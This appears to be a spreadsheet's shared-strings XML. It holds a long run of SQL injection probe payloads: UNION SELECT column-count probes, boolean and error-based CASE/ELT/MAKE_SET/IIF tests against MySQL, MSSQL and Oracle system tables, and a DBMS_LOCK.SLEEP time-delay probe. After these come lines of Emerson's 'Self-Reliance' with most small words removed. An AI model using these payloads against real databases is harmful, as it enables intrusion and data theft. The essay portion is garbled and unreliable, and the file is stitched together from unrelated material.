    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "aamz" LIKE "aamz</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "vLpY" LIKE "vLpY</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Bwgr" LIKE "Bwgr</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "DFWG" LIKE "DFWG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "LinJ" LIKE "LinJ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "SxYB" LIKE "SxYB</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "lbpv" LIKE "lbpv</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "cyZC" LIKE "cyZC</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</si>
  <si>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"wdbA" LIKE "wdbA</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "uUcg" LIKE "uUcg</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "CcHZ" LIKE "CcHZ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "wVRW" LIKE "wVRW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Bpbv" LIKE "Bpbv</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "iSDG" LIKE "iSDG</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Begm" LIKE "Begm</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "vqhE" LIKE "vqhE</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "qZPa" LIKE "qZPa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</si>
  <si>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"CIHg" LIKE "CIHg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</si>
  <si>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"wwld" LIKE "wwld</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Ofdx" LIKE "Ofdx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "zChF" LIKE "zChF</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "PhfN" LIKE "PhfN</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "CltK" LIKE "CltK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "TaYf" LIKE "TaYf</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "oUWl" LIKE "oUWl</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "GSsw" LIKE "GSsw</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "LtIE" LIKE "LtIE</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</si>
  <si>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"JFZU" LIKE "JFZU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</si>
  <si>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"TUIo" LIKE "TUIo</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "usoQ" LIKE "usoQ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "QiRD" LIKE "QiRD</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Welx" LIKE "Welx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "SBEn" LIKE "SBEn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "SwYK" LIKE "SwYK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Armh" LIKE "Armh</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "XHKa" LIKE "XHKa</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "RXIr" LIKE "RXIr</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "kzdQ" LIKE "kzdQ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</si>
  <si>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"ycYH" LIKE "ycYH</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 6778 = 6457 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 )  EN</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 2876 = 2876 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 )  EN</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 9762 = 3007 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 )  EN</t>
  </si>
  <si>
    <t xml:space="preserve">MAKE_SET ( 2491 = 2397,77B4A14B9E00AF083BA8806DA94B1348 ) </t>
  </si>
  <si>
    <t xml:space="preserve">MAKE_SET ( 2695 = 2695,77B4A14B9E00AF083BA8806DA94B1348 ) </t>
  </si>
  <si>
    <t xml:space="preserve">MAKE_SET ( 9745 = 128,77B4A14B9E00AF083BA8806DA94B1348 ) </t>
  </si>
  <si>
    <t xml:space="preserve">ELT ( 1722 = 7301,77B4A14B9E00AF083BA8806DA94B1348 ) </t>
  </si>
  <si>
    <t xml:space="preserve">ELT ( 9620 = 9620,77B4A14B9E00AF083BA8806DA94B1348 ) </t>
  </si>
  <si>
    <t xml:space="preserve">ELT ( 204 = 7101,77B4A14B9E00AF083BA8806DA94B1348 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 4371 = 783 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 4371* ( SELECT 437</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 2662 = 2662 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 2662* ( SELECT 26</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 5364 = 684 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 5364* ( SELECT 536</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 9784 = 3679 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 9784* ( SELECT 97</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 2182 = 2182 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 2182* ( SELECT 21</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 6061 = 4547 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 6061* ( SELECT 60</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 5500 = 7022 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 5500* ( SELECT 55</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 8275 = 8275 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 8275* ( SELECT 82</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 4715 = 6068 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 4715* ( SELECT 47</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 9546 = 6041 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 FRO</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 9041 = 9041 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 FRO</t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 3989 = 7130 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 FRO</t>
  </si>
  <si>
    <t xml:space="preserve">IIF ( 584 = 1672,77B4A14B9E00AF083BA8806DA94B1348,1/0 ) </t>
  </si>
  <si>
    <t xml:space="preserve">IIF ( 5990 = 5990,77B4A14B9E00AF083BA8806DA94B1348,1/0 ) </t>
  </si>
  <si>
    <t xml:space="preserve">IIF ( 4600 = 9122,77B4A14B9E00AF083BA8806DA94B1348,1/0 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( CASE WHEN 9065 = 8427 THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE NULL END ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( CASE WHEN 6322 = 6322 THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE NULL END ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( CASE WHEN 8942 = 2869 THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE NULL END ) </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;font color = "green"&gt;&amp;gt;&lt;/font&gt;806DA94B1348 ELSE 1/ ( SELECT 0 )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 6778 = 6457 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 2876 = 2876 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 9762 = 3007 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 4371 = 783 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 4371* ( SELECT 4371 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 2662 = 2662 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 2662* ( SELECT 2662 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 5364 = 684 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 5364* ( SELECT 5364 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 9784 = 3679 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 9784* ( SELECT 9784 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 2182 = 2182 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 2182* ( SELECT 2182 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 6061 = 4547 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 6061* ( SELECT 6061 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 5500 = 7022 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 5500* ( SELECT 5500 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 8275 = 8275 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 8275* ( SELECT 8275 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 4715 = 6068 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 4715* ( SELECT 4715 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 9546 = 6041 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 FROM DUAL )  END )  FROM DUAL ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 9041 = 9041 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 FROM DUAL )  END )  FROM DUAL ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( SELECT  ( CASE WHEN  ( 3989 = 7130 )  THEN 77B4A14B9E00AF083BA8806DA94B1348 ELSE 1/ ( SELECT 0 FROM DUAL )  END )  FROM DUAL ) </t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 876 = 1091 )  THEN 1 ELSE 1/ ( SELECT 0 )  E</t>
  </si>
  <si>
    <t>"  )  )   ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( "CtTg" = "CtT</t>
  </si>
  <si>
    <t>; Path = /; HttpOnly</t>
  </si>
  <si>
    <t xml:space="preserve">,0x28 ) </t>
  </si>
  <si>
    <t xml:space="preserve">,1/0 ) </t>
  </si>
  <si>
    <t xml:space="preserve">  Add plain text “Ne te quaesiveris extra</t>
  </si>
  <si>
    <t>” “Man star; soul Render honest perfect man, Commands light, influence, fate; Nothing falls early late</t>
  </si>
  <si>
    <t xml:space="preserve"> Our acts angels are, good ill, Our fatal shadows walk us still</t>
  </si>
  <si>
    <t>” Epilogue Beaumont Fletcher’s Honest Man’s Fortune Cast bantling rocks, Suckle she-wolf’s teat; Wintered hawk fox, Power speed hands feet</t>
  </si>
  <si>
    <t xml:space="preserve"> I read day verses written eminent painter original conventional</t>
  </si>
  <si>
    <t xml:space="preserve"> The soul always hears admonition lines, let subject may</t>
  </si>
  <si>
    <t xml:space="preserve"> The sentiment instil value thought may contain</t>
  </si>
  <si>
    <t xml:space="preserve"> To believe thought, believe true private heart true men, — genius</t>
  </si>
  <si>
    <t xml:space="preserve"> Speak latent conviction, shall universal sense; inmost due time becomes outmost, — first thought rendered back us trumpets Last Judgment</t>
  </si>
  <si>
    <t xml:space="preserve"> Familiar voice mind each, highest merit ascribe Moses, Plato, Milton is, set naught books traditions, spoke men thought</t>
  </si>
  <si>
    <t xml:space="preserve"> A man learn detect watch gleam light flashes across mind within, lustre firmament bards sages</t>
  </si>
  <si>
    <t xml:space="preserve"> Yet dismisses without notice thought, his</t>
  </si>
  <si>
    <t xml:space="preserve"> In every work genius recognize rejected thoughts: come back us certain alienated majesty</t>
  </si>
  <si>
    <t xml:space="preserve"> Great works art affecting lesson us this</t>
  </si>
  <si>
    <t xml:space="preserve"> They teach us abide spontaneous impression good-humored inflexibility whole cry voices side</t>
  </si>
  <si>
    <t xml:space="preserve"> Else, to-morrow stranger say masterly good sense precisely thought felt time, shall forced take shame opinion another</t>
  </si>
  <si>
    <t xml:space="preserve"> There time every man’s education arrives conviction envy ignorance; imitation suicide; must take better, worse, portion; though wide universe full good, kernel nourishing corn come toil bestowed plot ground given till</t>
  </si>
  <si>
    <t xml:space="preserve"> The power resides new nature, none knows do, know tried</t>
  </si>
  <si>
    <t xml:space="preserve"> Not nothing one face, one character, one fact, makes much impression him, another none</t>
  </si>
  <si>
    <t xml:space="preserve"> This sculpture memory without preestablished harmony</t>
  </si>
  <si>
    <t xml:space="preserve"> The eye placed one ray fall, might testify particular ray</t>
  </si>
  <si>
    <t xml:space="preserve"> We half express ourselves, ashamed divine idea us represents</t>
  </si>
  <si>
    <t xml:space="preserve"> It may safely trusted proportionate good issues, faithfully imparted, God work made manifest cowards</t>
  </si>
  <si>
    <t xml:space="preserve"> A man relieved gay put heart work done best; said done otherwise, shall give peace</t>
  </si>
  <si>
    <t xml:space="preserve"> It deliverance deliver</t>
  </si>
  <si>
    <t xml:space="preserve"> In attempt genius deserts him; muse befriends; invention, hope</t>
  </si>
  <si>
    <t xml:space="preserve"> Trust thyself: every heart vibrates iron string</t>
  </si>
  <si>
    <t xml:space="preserve"> Accept place divine providence found you, society contemporaries, connection events</t>
  </si>
  <si>
    <t xml:space="preserve"> Great men always done so, confided childlike genius age, betraying perception absolutely trustworthy seated heart, working hands, predominating being</t>
  </si>
  <si>
    <t xml:space="preserve"> And men, must accept highest mind transcendent destiny; minors invalids protected corner, cowards fleeing revolution, guides, redeemers, benefactors, obeying Almighty effort, advancing Chaos Dark</t>
  </si>
  <si>
    <t xml:space="preserve"> What pretty oracles nature yields us text, face behaviour children, babes, even brutes! That divided rebel mind, distrust sentiment arithmetic computed strength means opposed purpose, not</t>
  </si>
  <si>
    <t xml:space="preserve"> Their mind whole, eye yet unconquered, look faces, disconcerted</t>
  </si>
  <si>
    <t xml:space="preserve"> Infancy conforms nobody: conform it, one babe commonly makes four five adults prattle play it</t>
  </si>
  <si>
    <t xml:space="preserve"> So God armed youth puberty manhood less piquancy charm, made enviable gracious claims put by, stand itself</t>
  </si>
  <si>
    <t xml:space="preserve"> Do think youth force, cannot speak me</t>
  </si>
  <si>
    <t xml:space="preserve"> Hark! next room voice sufficiently clear emphatic</t>
  </si>
  <si>
    <t xml:space="preserve"> It seems knows speak contemporaries</t>
  </si>
  <si>
    <t xml:space="preserve"> Bashful bold, then, know make us seniors unnecessary</t>
  </si>
  <si>
    <t xml:space="preserve"> The nonchalance boys sure dinner, would disdain much lord say aught conciliate one, healthy attitude human nature</t>
  </si>
  <si>
    <t xml:space="preserve"> A boy parlour pit playhouse; independent, irresponsible, looking corner people facts pass by, tries sentences merits, swift, summary way boys, good, bad, interesting, silly, eloquent, troublesome</t>
  </si>
  <si>
    <t xml:space="preserve"> He cumbers never consequences, interests: gives independent, genuine verdict</t>
  </si>
  <si>
    <t xml:space="preserve"> You must court him: court you</t>
  </si>
  <si>
    <t xml:space="preserve"> But man is, were, clapped jail consciousness</t>
  </si>
  <si>
    <t xml:space="preserve"> As soon acted spoken eclat, committed person, watched sympathy hatred hundreds, whose affections must enter account</t>
  </si>
  <si>
    <t xml:space="preserve"> There Lethe this</t>
  </si>
  <si>
    <t xml:space="preserve"> Ah, could pass neutrality! Who thus avoid pledges, observed, observe unaffected, unbiased, unbribable, unaffrighted innocence, must always formidable</t>
  </si>
  <si>
    <t xml:space="preserve"> He would utter opinions passing affairs, seen private, necessary, would sink like darts ear men, put fear</t>
  </si>
  <si>
    <t xml:space="preserve"> These voices hear solitude, grow faint inaudible enter world</t>
  </si>
